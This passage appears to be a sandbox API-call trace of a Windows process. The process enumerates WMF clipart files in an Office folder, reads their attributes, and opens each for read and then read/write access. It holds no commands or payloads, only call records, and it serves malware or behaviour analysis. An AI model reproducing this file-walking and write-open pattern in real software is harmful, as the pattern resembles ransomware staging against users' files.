Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdec)) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0103.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.686] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.686] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CLASSIC1.WMF", cAlternateFileName="")) returned 1 [0103.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0103.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0103.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0103.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0103.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.688] AreFileApisANSI () returned 1 [0103.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0103.688] AreFileApisANSI () returned 1 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 69 [0103.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.689] GetFileType (hFile=0x27c) returned 0x1 [0103.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.689] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.689] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.689] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.689] CloseHandle (hObject=0x27c) returned 1 [0103.689] AreFileApisANSI () returned 1 [0103.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0103.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 69 [0103.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.690] GetFileType (hFile=0x27c) returned 0x1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.690] CloseHandle (hObject=0x27c) returned 1 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.691] AreFileApisANSI () returned 1 [0103.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 69 [0103.691] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x976)) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CLASSIC2.WMF", cAlternateFileName="")) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.692] AreFileApisANSI () returned 1 [0103.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0103.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.693] AreFileApisANSI () returned 1 [0103.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0103.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 69 [0103.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.753] GetFileType (hFile=0x368) returned 0x1 [0103.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0103.754] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.754] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.754] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.754] CloseHandle (hObject=0x368) returned 1 [0103.754] AreFileApisANSI () returned 1 [0103.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0103.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 69 [0103.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.754] GetFileType (hFile=0x368) returned 0x1 [0103.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.755] CloseHandle (hObject=0x368) returned 1 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 